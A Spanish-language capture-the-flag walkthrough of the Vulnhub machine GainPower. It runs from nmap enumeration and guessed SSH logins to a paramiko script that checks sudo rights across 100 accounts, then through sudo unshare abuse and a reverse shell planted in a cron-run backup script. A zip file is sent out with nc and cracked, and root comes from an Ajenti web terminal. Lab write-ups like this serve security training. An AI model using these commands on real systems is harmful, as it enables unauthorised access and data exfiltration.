[VLN] GainPower

Hoy vamos a hackear la maquina de Vulnhub llamada GainPower. Podeis descargarla desde el siguiente enlace: GainPower

Video


numeration


Empezamos con un nmap para ver que puertos tiene abiertos.

sml@Cassandra:~$ nmap -A -p- 192.168.1.34
Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-30 11:53 CEST
Nmap scan report for 192.168.1.34
Host is up (0.0016s latency).
Not shown: 65532 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey: 
|   2048 88:41:61:11:e1:1f:18:7d:d6:0c:38:29:25:79:16:2c (RSA)
|   256 18:c5:fd:ce:cd:2b:92:f8:d9:17:17:21:24:9d:67:df (ECDSA)
|_  256 84:c5:14:e4:e9:33:21:41:6a:92:72:b9:a7:33:1a:ea (ED25519)
80/tcp   open  http    Apache httpd 2.4.6 ((CentOS))
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.6 (CentOS)
|_http-title: Watch shop | eCommers
8000/tcp open  http    Ajenti http control panel
|_http-title: Ajenti

Service detection performed. Please report any incorrect results at 
https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.79 seconds
Nos conectamos por ssh para ver si nos muestra algo.

sml@Cassandra:~/tools$ ssh holi@192.168.1.34
Hi !!! THIS MESSAGE IS ONLY VISIBLE IN OUR NETWORK :) 

   ___      _        ___                    
  / __|__ _(_)_ _   | _ \_____ __ _____ _ _ 
 | (_ / _` | | ' \  |  _/ _ \ V  V / -_) '_|
  \___\__,_|_|_||_| |_| \___/\_/\_/\___|_|  
                                            

I HOPE EVERYONE KNOW THE JOINING ID CAUSE THAT IS YOUR USERNAME : ie : 
employee1 employee2 ... ... ... so on ;)

I already told the format of password of everyone in the yesterday's metting.

Now i have configured everything. My request is to everyone to Complete 
assignments on time 

btw one of my employee have sudo powers because he is my favourite 

NOTE : "This message will automatically removed after 2 days" 
                                                                - BOSS
holi@192.168.1.34's password: 
Podemos leer que los usuarios son del tipo employee1, employee2 etc... Tambien indica que el formato de password ya lo saben, y que uno de los usuarios tiene poderes "sudo". Sabiendo esto, y tras probar, nos podemos loguear usando la misma password que el nombre de usuario, es decir, nos podemos loguear usando employee1/employee1 o employee2/employee2 etc... Nos logueamos como employee1 para echar un primer vistazo.

Low Shell



sml@Cassandra:~$ ssh employee1@192.168.1.34
Hi !!! THIS MESSAGE IS ONLY VISIBLE IN OUR NETWORK :) 

   ___      _        ___                    
  / __|__ _(_)_ _   | _ \_____ __ _____ _ _ 
 | (_ / _` | | ' \  |  _/ _ \ V  V / -_) '_|
  \___\__,_|_|_||_| |_| \___/\_/\_/\___|_|  
                                            

I HOPE EVERYONE KNOW THE JOINING ID CAUSE THAT IS YOUR USERNAME : ie : 
employee1 employee2 ... ... ... so on ;)

I already told the format of password of everyone in the yesterday's metting.

Now i have configured everything. My request is to everyone to Complete 
assignments on time 

btw one of my employee have sudo powers because he is my favourite 

NOTE : "This message will automatically removed after 2 days" 
                                                                - BOSS
 
employee1@192.168.1.34's password: 
Last login: Tue Jun 30 18:01:37 2020 from cassandra.home
[employee1@localhost ~]$
Sabemos que hay un empleado que tiene privilegios sudo, asi que vamos a ver cuantos empleados hay.

[employee1@localhost home]$ cat /etc/passwd | grep employ
---SNIP---
employee16:x:1015:1015::/home/employee16:/bin/bash
employee51:x:1050:1050::/home/employee51:/bin/bash
employee52:x:1051:1051::/home/employee52:/bin/bash
employee97:x:1096:1096::/home/employee97:/bin/bash
employee98:x:1097:1097::/home/employee98:/bin/bash
employee99:x:1098:1098::/home/employee99:/bin/bash
employee100:x:1099:1099::/home/employee100:/bin/bash
---SNIP---
Vemos que hay 100... Preparamos un script en python que lo que hara sera loguearse como el usuario employeeX y ejecutara sudo para ver si tiene permisos o da un error. El script es el siguiente:

#!/usr/bin/env python
import paramiko
def fuckme(seraeste):
        print seraeste
        l_password = seraeste
        l_host = "192.168.1.34" #MODIFY IP
        l_user = seraeste
        ssh = paramiko.SSHClient()
        ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
        ssh.connect(l_host, username=l_user, password=l_password)
        transport = ssh.get_transport()
        session = transport.open_session()
        session.set_combine_stderr(True)
        session.get_pty()

        session.exec_command("sudo -l")
        stdin = session.makefile('wb', -1)
        stdout = session.makefile('rb', -1)
        stdin.write(l_password +'\n')
        stdin.flush()
        for line in stdout.read().splitlines():
                print 'host: %s: %s' % (l_host, line)

for x in range (1,101):
        yeah = "employee" + str(x)
        fuckme(yeah)
Ejecutamos el script...

sml@Cassandra:~$ python g.py
---SNIP---
host: 192.168.1.34: employee63
host: 192.168.1.34: [sudo] password for employee63: 
host: 192.168.1.34: Sorry, user employee63 may not run sudo on localhost.
employee64
host: 192.168.1.34: employee64
host: 192.168.1.34: [sudo] password for employee64: 
host: 192.168.1.34: Matching Defaults entries for employee64 on localhost:
host: 192.168.1.34:     !visiblepw, always_set_home, match_group_by_gid, 
always_query_group_plugin,
host: 192.168.1.34:     env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE 
KDEDIR LS_COLORS",
host: 192.168.1.34:     env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS 
LC_CTYPE",
host: 192.168.1.34:     env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT 
LC_MESSAGES",
host: 192.168.1.34:     env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER 
LC_TELEPHONE",
host: 192.168.1.34:     env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET 
XAUTHORITY",
host: 192.168.1.34:     secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin
host: 192.168.1.34: 
host: 192.168.1.34: User employee64 may run the following commands on localhost:
host: 192.168.1.34:     (programmer) /usr/bin/unshare
employee65
host: 192.168.1.34: employee65
host: 192.168.1.34: [sudo] password for employee65: 
host: 192.168.1.34: Sorry, user employee65 may not run sudo on localhost.
---SNIP---
Vemos que el usuario employee64 puede usar sudo! Nos logueamos con employee64/employee64.

sml@Cassandra:~/tools$ ssh employee64@192.168.1.34
Hi !!! THIS MESSAGE IS ONLY VISIBLE IN OUR NETWORK :) 

   ___      _        ___                    
  / __|__ _(_)_ _   | _ \_____ __ _____ _ _ 
 | (_ / _` | | ' \  |  _/ _ \ V  V / -_) '_|
  \___\__,_|_|_||_| |_| \___/\_/\_/\___|_|  
                                            

I HOPE EVERYONE KNOW THE JOINING ID CAUSE THAT IS YOUR USERNAME : ie : 
employee1 employee2 ... ... ... so on ;)

I already told the format of password of everyone in the yesterday's metting.

Now i have configured everything. My request is to everyone to Complete 
assignments on time 

btw one of my employee have sudo powers because he is my favourite 

NOTE : "This message will automatically removed after 2 days" 
                                                                - BOSS
employee64@192.168.1.34's password: 
Last failed login: Tue Jun 30 08:05:27 EDT 2020 from cassandra.home on ssh:notty
There were 677 failed login attempts since the last successful login.
Last login: Mon May 18 08:59:41 2020
[employee64@localhost ~]$
Una vez logueados, ejecutamos sudo -l para ver que podemos hacer.

[employee64@localhost ~]$ sudo -l
Matching Defaults entries for employee64 on localhost:
    !visiblepw, always_set_home, match_group_by_gid, always_query_group_plugin, 
env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR LS_COLORS",
    env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE", 
env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES", 
env_keep+="LC_MONETARY
    LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE", env_keep+="LC_TIME LC_ALL 
LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY", 
secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin

User employee64 may run the following commands on localhost:
    (programmer) /usr/bin/unshare
Podemos usar unshare como el usuario programmer. Lo aprovechamos para obtener una shell como "programmer".

[employee64@localhost ~]$ sudo -u programmer /usr/bin/unshare /bin/bash
bash-4.2$ id
uid=1182(programmer) gid=1184(prome) grupos=1184(prome) 
contexto=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
Ahora que estamos como programmer, investigamos un poco mas el sistema.

bash-4.2$ groups
prome
bash-4.2$ find / -group prome 2>/dev/null
/proc/20325/timers
/proc/20325/patch_state
/tmp/back.txt
/home/vanshal
/media/programmer
/media/programmer/scripts
/media/programmer/scripts/backup.sh
Vemos que pertenecemos al grupo "prome" y que dicho grupo puede modificar el script /media/programmer/scripts/backup.sh. Al lanzar pspy64 vemos que hay una tarea que ejecuta el script como el usuario vanshal (UID 1183).

2020/06/30 08:55:01 CMD: UID=1183 PID=20604  | /bin/bash 
/media/programmer/scripts/backup.sh
La maquina no tiene nc, asi que lo descargamos de nuestra maquina en su /tmp.

bash-4.2$ wget http://192.168.1.148/nc
--2020-06-30 08:57:03--  http://192.168.1.148/nc
Conectando con 192.168.1.148:80... conectado.
PeticiГіn HTTP enviada, esperando respuesta... 200 OK
Longitud: 35520 (35K) [application/octet-stream]
Grabando a: “nc”

100%[===========================================================================
================================================>] 35.520      --.-K/s   en 0s  
    

2020-06-30 08:57:03 (574 MB/s) - “nc” guardado [35520/35520]

bash-4.2$ chmod +x nc
Modificamos el script para obtener una reverse shell.

bash-4.2$ vi /media/programmer/scripts/backup.sh
#agregamos /tmp/nc -e /bin/bash 192.168.1.148 5555
Ponemos nc a la escucha.

sml@Cassandra:~$ nc -nlvp 5555
listening on [any] 5555 ...
Y tras esperar...

sml@Cassandra:~$ nc -nlvp 5555
listening on [any] 5555 ...
connect to [192.168.1.148] from (UNKNOWN) [192.168.1.34] 33524
id
uid=1183(vanshal) gid=1184(prome) groups=1184(prome) 
context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
python -c 'import pty; pty.spawn("/bin/bash")'
[vanshal@localhost ~]$

local.txt


 
[vanshal@localhost ~]$ ls                                                            
local.txt  secret.zip  
[vanshal@localhost ~]$ cat local.txt
You successfully owned the user of this box :-) Best of Luck 
for the root 
flag: 5c2a29d7b95868da9e503502f301e8dd
Twitter : VanshalG
Vemos que hay un fichero llamado secret.zip. Utilizamos nc para transferirlo a nuestra maquina y poder crackearlo. En nuestra maquina ejecutamos:

sml@Cassandra:~$ nc -lp 1234 > secret.zip
En la victima:

[vanshal@localhost ~]$ /tmp/nc -w 3 192.168.1.148 1234 < secret.zip
Una vez tenemos el fichero .zip, crackeamos la password:

sml@Cassandra:~$ fcrackzip -v -u -D -p rockyou.txt secret.zip
found file 'Mypasswords.txt', (size cp/uc    243/   257, flags 9, chk 7f46)
PASSWORD FOUND!!!!: pw == 81237900
Descomprimimos el fichero....

sml@Cassandra:~$ unzip secret.zip
Archive:  secret.zip
[secret.zip] Mypasswords.txt password: 
  inflating: Mypasswords.txt
Miramos el contenido.

sml@Cassandra:~$ cat Mypasswords.txt 
aTQ!vYxQUh3$&uaN3p%@_ax#Ab2XNZ!5$rFh$@bDMyxt#&Q2L&4+DvDT?A!MPKK9sFq-V8_d$5gQLKyK
hf-4&S=_m^Cx?bZYf8Bv%%*H^GcvDc4ayfPk^HWs8bnD%Ayk3$5WP6_K?a6_%MF&e-DS2ZZ$m93BL3CY
!huQDM2-JZcMSMKT8K*Z7zLPGATU7JP&x#JtaZHAbM^%$TK%C3ubXV4#e87M6P-puXTTMbzuP5y4qX6U
zd%ed8Ux_vMX=pCB

Privilege Escalation


Vemos un string que podria ser un hash... pero no lo es :) Vamos a http://192.168.1.34:8000 y de credenciales usamos root/(el contenido de Mypasswords.txt) Si... era el password :) En la parte izquierda vamos a "Terminal", y luego en el cuadrado superior derecho escribimos "/bin/bash", por ultimo hacemos click en el boton "Run" y se nos abrira una terminal "web" como root.

root.txt



[root@localhost root]# ls                                                                                                                                      
proof.txt                                                                                                                                                      
[root@localhost root]# cat proof.txt                                                                                                        
You successfully owned the root of this box :-)                                                                                                                 
Flag: eb2e174c3883ff6b5fd871167795b4d6                                                                                                                       
Twitter : VanshalG                                                              

End


Y con esto ya seriamos root de la maquina :)